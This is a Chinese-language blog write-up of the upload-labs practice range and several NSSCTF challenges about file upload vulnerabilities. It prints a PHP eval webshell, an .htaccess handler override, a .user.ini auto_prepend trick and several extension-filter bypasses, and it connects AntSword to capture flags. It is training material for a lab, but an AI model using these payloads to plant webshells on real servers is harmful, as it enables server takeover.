该博客围绕文件上传漏洞展开,先介绍了渗透环境搭建,需下载phpstudy与upload - labs并复制到根目录测试。接着通过Pass 01 - 11详细分析不同过滤情况及绕过方法,如禁用javascript、使用burp suite抓包、修改服务器配置等。最后进行多个实战演示,利用蚁剑连接获取flag。
文件上传漏洞简介
文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。
所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。比如:
--验证文件类型、后缀名、大小;
--验证文件的上传方式;
--对文件进行一定复杂的重命名;
--不要暴露文件上传后的路径;
--等等...
渗透环境的搭建:
我们首先下载phpstudy,与upload-labs如下图所示:
将其复制到phpstudy所搭建的根目录下:
打开网站测试是否搭建成功:
Pass 01
既然是文件上传,我们首先先传一个文件看看:
先写个一句话木马:
<?php
eval($_POST[1]);
?>
首先来分析一下:
这意味着如果您向这段代码发送一个POST请求,并在请求中包含名为"1"的参数,那么该参数的值将被当作PHP代码来执行。这样的代码结构非常危险,因为它可能会使攻击者执行任意的PHP代码,并对服务器进行恶意操作。
好吧这个很重要,一会我们来看看如何使用它。
哎呀,上传失败了。
我们具体分析一下源码:
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}
看起来不怎么熟悉:原来是javascprit写的,我们将其禁用然后上传看看:
接下来上传:
右键打开图片路径进行分析:
使用hackbar传参:
这个1是什么?回想一下之前的一句话木马,很关键。
然后我们看一下路径:
诶怎么不行啊,ls是Linux的,windows是dir
然后,我们可以进一步跟据目录去获取文件,之后我们根据CTF题目去实践一下。
PS:Linux,Windows的系统如何判断:
ping 判断TTL值:大于100的一般为Windows
这是我自己搭的靶场,是Linux
Pass 02
啥都不说:先上传看看:
报错与刚刚不一样:
我们先分析一下源码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}
代码上说运行image/jpeg上传,我们使用burp suite抓包重放试试:
成功上传。
Pass 03
老规矩先上传:
注意报错信息:
查看源码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
尝试畸形文件,比如.php5
上传成功:
但是我们hackbar看看
啥都没有啊:注意我们传的文件是php5
代码自然识别不了:
这种情况我们应该修改服务器的apache配置文件,然后重新上传即可
去掉#号,添加php5,重新上传即可。
Pase 4
上传:
php5试一下:
依旧不行,
看看源码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
原来是被过滤了。
我们先了解一下.htaccess文件:
.htaccess文件(或者”分布式配置文件”),全称是Hypertext Access(超文本入口)。提供了针对目录改变配
置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所
有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置
新建一个.htaccess文件:
<FilesMatch "jpeg">
SetHandler application/x-httpd-php
</FilesMatch>
将jpeg文件当作php解析。
burp suite 抓包
发现成功
Pass 05
直接看源码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
发现.htaccess被过滤:上传.ini文件
auto_prepend_file=1.jpg 自动把文件改为.ini 然后去修改参数,传入1.jpg,发现打不开:
因为先访问php,才会包含.jpg
成功
Pass 06
查看源码,发现未过滤大小写,直接传.Php
Pass 07
发现没有过滤空格,抓包直接加空格:
错了,别傻傻的直接加空格:%20是url编码。
Pass 08 未过滤.可以参考上面的。
Pass 09 没有对::$DATA过滤
Pass 10 :
先看代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
deldot()函数遇到空格会跳过,遇到.会跳过:
我们直接改.php. .:
Pass 11
直接看代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
str_ireplace()函数,查找在黑名单中的文件,然后去掉,直接双写绕过:
实战演示:
先抓一手包:
改参数,直接获取路径
传shell.jpg
连接蚁剑:
实战演示2
打开界面传入我们的一句话木马,发现失败:
burpsuite抓包,修改image/jpeg 发现成功上传:
直接访问路径,发现空白,但是确实上传成功:
蚁剑连接一下,发现路径:
怎么是假的,返回页面,使用phpinfo();ctrl+f,查找得flag
实战演示3
直接传:
好吧抓包试一下:
安装上一题的方法,不行滴
你要jpeg,那就给你喽:
是不是很熟悉:
我们先传.htaccess
<FilesMatch “1.jpeg”>
SetHandler application/x-httpd-php
不行
我们改后缀名去试试:
成功
NSSCTF{ee147073-b816-4b56-8796-0aff0fb72573}
实战演示 04
直接传:
不行,传.haccess
再传php
访问:
上蚁剑:
NSSCTF{33e52072-64ca-4b37-9f21-05b8d587d307}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
